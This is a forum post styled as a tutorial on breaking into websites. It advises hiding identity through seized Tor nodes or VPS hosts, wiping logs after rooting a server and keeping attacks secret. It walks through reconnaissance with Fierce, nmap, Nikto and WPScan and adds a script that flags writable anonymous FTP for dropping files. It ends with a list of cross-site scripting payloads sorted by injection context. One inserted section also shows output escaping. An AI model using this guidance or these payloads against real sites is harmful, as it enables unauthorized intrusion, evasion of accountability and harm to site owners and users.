Forum Thread: How to Hack a Website. Part 1

Part 1: Staying Anonymous

1.) Install Whonix - "Whonix is a Debian GNU/Linux based security-focused Linux distribution. It aims to provide privacy, security and anonymity on the internet. The operating system consists of two virtual machines, a "Workstation" and a Tor "Gateway", running Debian GNU/Linux." Basically: the Workstation VM has no route to the network except through the Gateway VM, so every connection it makes goes over Tor, including traffic from software that ignores proxy settings and would otherwise leak your real address.

2.) That step is for testing. Do not actually hack over Tor! You could use a virtual private server based in Sweden or somewhere similar, or you could seize a Tor node and make it your own. There are always multiple options. Using a virtual private server is usually the best way to go; I recommend that myself.

3.) Once you have rooted the server, remember to remove all the logs. Keep that in mind.

4.) Use a realistic User-Agent. The string given in the original post, Mozilla/4.0 (compatible; MSIE 5.5; Windows 95), is a poor choice: no real browser has sent an Internet Explorer 5.5 on Windows 95 string in years, so it stands out in a server log far more than a default one would. Copy the exact string a current mainstream browser sends and keep the same string for the whole job, because switching between several is itself a pattern.

5.) This step is common sense. Do not tell anyone about your hacks. You could, I guess, tell people online while using a virtual private network, but never people in real life. That is what will get you caught, eventually.

Part 2: Mapping out the target

1.) Mapping out a target is a crucial step! Remember that to hack your target you must find a vulnerability, and to find one you must know your target entirely.

2.) Use a DNS domain scanner. Fierce finds a target's subdomains by attempting zone transfers and then brute-forcing names from a wordlist. On Kali Linux the classic Perl version is run as fierce -dns website.com (or fierce.pl -dns website.com if you have the script itself); the newer Python rewrite takes fierce --domain website.com instead.

3.) Check out all those hosts. You might find something good: a login form vulnerable to SQL injection, possibly, or a forgotten staging copy of the main site.

Part 3: Vulnerability finding

1.) Scan the target's services with nmap, with version detection turned on, so you learn not just which ports are open but what software is listening and which version it claims to be.

2.) Maybe they have an FTP server that allows anonymous read/write access to something quite important. Believe it or not, some do.

3.) Maybe it runs old software. You can most probably find a public exploit for it online. :)

4.) REMEMBER TO LOOK AT ALL THE SUBDOMAINS!

5.) You can run Nikto, a web server scanner. It sends thousands of requests checking for known dangerous files and scripts, outdated server software and common misconfigurations, and reports whatever matches its database. It does not find every vulnerability in the system, and it is very noisy, so treat its output as leads to verify by hand.

6.) Once you know what software the website is running, e.g. WordPress, use a scanner built for it, such as WPScan, which enumerates the installed version, plugins and themes and matches them against known vulnerabilities.
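As an added example that is not code from the original post, here is a small Python triage script for the nmap step above. It reads the XML report that nmap writes when run with -sV -sC -oX, lists the open ports together with the product and version each service reported (the "old software" leads), and flags FTP servers where nmap's ftp-anon script logged in anonymously, pulling out any world-writable directories from the listing it returned. The embedded report is constructed sample data with 192.0.2.10 and example.com placeholders, not a real scan.

```python
"""Triage nmap -sV -sC -oX output: open ports, disclosed versions, anonymous FTP."""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# Constructed sample of an nmap XML report (placeholder host, not a real scan).
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -sC -oX scan.xml 192.0.2.10">
<host>
<address addr="192.0.2.10" addrtype="ipv4"/>
<hostnames><hostname name="files.example.com" type="user"/></hostnames>
<ports>
<port protocol="tcp" portid="21">
<state state="open"/>
<service name="ftp" product="ProFTPD" version="1.3.5"/>
<script id="ftp-anon" output="Anonymous FTP login allowed (FTP code 230)&#10;drwxrwxrwx   2 0   0   4096 Jan 01  2015 upload&#10;-rw-r--r--   1 0   0   1024 Jan 01  2015 README"/>
</port>
<port protocol="tcp" portid="80">
<state state="open"/>
<service name="http" product="Apache httpd" version="2.2.15"/>
</port>
<port protocol="tcp" portid="443">
<state state="filtered"/>
<service name="https"/>
</port>
</ports>
</host>
</nmaprun>
"""


@dataclass
class HostFindings:
    addr: str
    open_ports: list = field(default_factory=list)        # (port, service, product, version)
    versioned: list = field(default_factory=list)         # services that disclosed a version
    anon_ftp: bool = False
    anon_ftp_writable: list = field(default_factory=list)  # world-writable entries in the listing


def _world_writable(listing_line: str) -> bool:
    """True for an `ls -l` style line whose 'other' permission triplet contains w."""
    parts = listing_line.split()
    if not parts:
        return False
    perms = parts[0]
    return len(perms) >= 10 and perms[8] == "w"


def triage(xml_text: str) -> dict:
    """Map host address -> HostFindings for every host in an nmap XML report."""
    root = ET.fromstring(xml_text)
    results = {}
    for host in root.iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        hf = HostFindings(addr)
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are noise for this pass
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            product = svc.get("product", "") if svc is not None else ""
            version = svc.get("version", "") if svc is not None else ""
            portid = port.get("portid")
            hf.open_ports.append((portid, name, product, version))
            if product and version:
                hf.versioned.append((portid, product, version))  # look these up later
            for script in port.iter("script"):
                if script.get("id") != "ftp-anon":
                    continue
                out = script.get("output", "")
                if out.startswith("Anonymous FTP login allowed"):
                    hf.anon_ftp = True
                    # Lines after the banner are the directory listing nmap fetched.
                    for line in out.splitlines()[1:]:
                        if _world_writable(line):
                            hf.anon_ftp_writable.append(line.split()[-1])
        results[addr] = hf
    return results


if __name__ == "__main__":
    for addr, findings in triage(SAMPLE_XML).items():
        print(addr, findings)
```

Run the real scan with nmap -sV -sC -oX scan.xml against the hosts you found in Part 2, then feed the file to triage(); the versioned list is what you search for public exploits, and anything in anon_ftp_writable is a place where you could drop files without credentials.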

I will show you how to get r00t in the next episode.

For a treat, I'll give you guys this:

Multiple advanced XSS payloads. They cover three injection contexts: plain HTML (the bare <img>, <svg> and <body> tags), a quoted attribute value (the ones that open with "> or otherwise start with a quote), and a JavaScript string inside a script (the one starting with ";alert). Pick the one that matches where your input lands in the page:

<IMG SRC=/ onerror="alert('NULLBYTE')"></img>
<svg onload="alert('nullbyte')" />
<svg/onLoad=alert(1)>
"><svg/onload=alert(/null/)>
";alert(/null/);a =" \' nullbyte
#!"><img src=1 onerror=prompt(null)>//
x" autofocus onfocus="alert('null')
Sos" onmouseover="alert('null')"/
"></iframe><svg/onload=alert(/null/)>
"><svg><script>/<@/>alert(1337)</script>
<body onhashchange=alert(1337)>
"><svg onload=alert(1337)>
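The payloads above only fire because the input reached the page in a context where its characters have meaning. As an added example that is not from the original post, the Python below takes three payloads from the list, renders each into the three contexts they target (HTML body, a quoted attribute value, a JavaScript string inside a script element), first unencoded as a vulnerable template would, then with the encoding that context needs. The render functions and the crude injected_tags check are illustrative helpers written for this example, not code from any real site.

```python
"""The same untrusted string dropped into three output contexts, raw vs. encoded."""
import html
import re

# Three payloads from the list in the post, one per output context.
PAYLOADS = {
    "html_body": "<svg/onload=alert(1)>",
    "attribute": '"><svg onload=alert(1337)>',
    "js_string": '";alert(/null/);a ="',
}


def js_string_escape(s: str) -> str:
    """Encode everything but [A-Za-z0-9] as \\xHH or \\uHHHH, so the value can neither
    close the JS string literal nor, via </script>, the surrounding script element."""
    out = []
    for ch in s:
        cp = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif cp < 0x100:
            out.append(f"\\x{cp:02x}")
        else:
            out.append(f"\\u{cp:04x}")
    return "".join(out)


def render_unsafe(q: str) -> str:
    """Vulnerable template: the search term is pasted into all three contexts as-is."""
    return "\n".join([
        f"<p>Results for {q}</p>",
        f'<input value="{q}">',
        f'<script>var q = "{q}";</script>',
    ])


def render_safe(q: str) -> str:
    """Hardened template: HTML entity encoding for body and attribute (quote=True also
    covers both quote characters), JS string escaping inside the script."""
    e = html.escape(q, quote=True)
    return "\n".join([
        f"<p>Results for {e}</p>",
        f'<input value="{e}">',
        f'<script>var q = "{js_string_escape(q)}";</script>',
    ])


def injected_tags(page: str) -> list:
    """Crude check: element tags carrying an on* event handler anywhere in the page."""
    return re.findall(r"<(svg|img|body)\b[^>]*\bon\w+\s*=", page, flags=re.I)


if __name__ == "__main__":
    for ctx, payload in PAYLOADS.items():
        print(f"--- {ctx}: {payload}")
        print("unsafe handlers:", injected_tags(render_unsafe(payload)))
        print("safe handlers:  ", injected_tags(render_safe(payload)))
        print(render_safe(payload))
```

Note that the attribute payload lands live in all three unsafe contexts at once, which is why the "> variants in the list are the most portable; the JavaScript-string payload produces no new tag at all, so a tag-based filter or scanner check never sees it, and only the context-correct escaping in render_safe stops it.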


1 Response

Yep. I know. I didn't have time. That's why I didn't show how to get r00t.
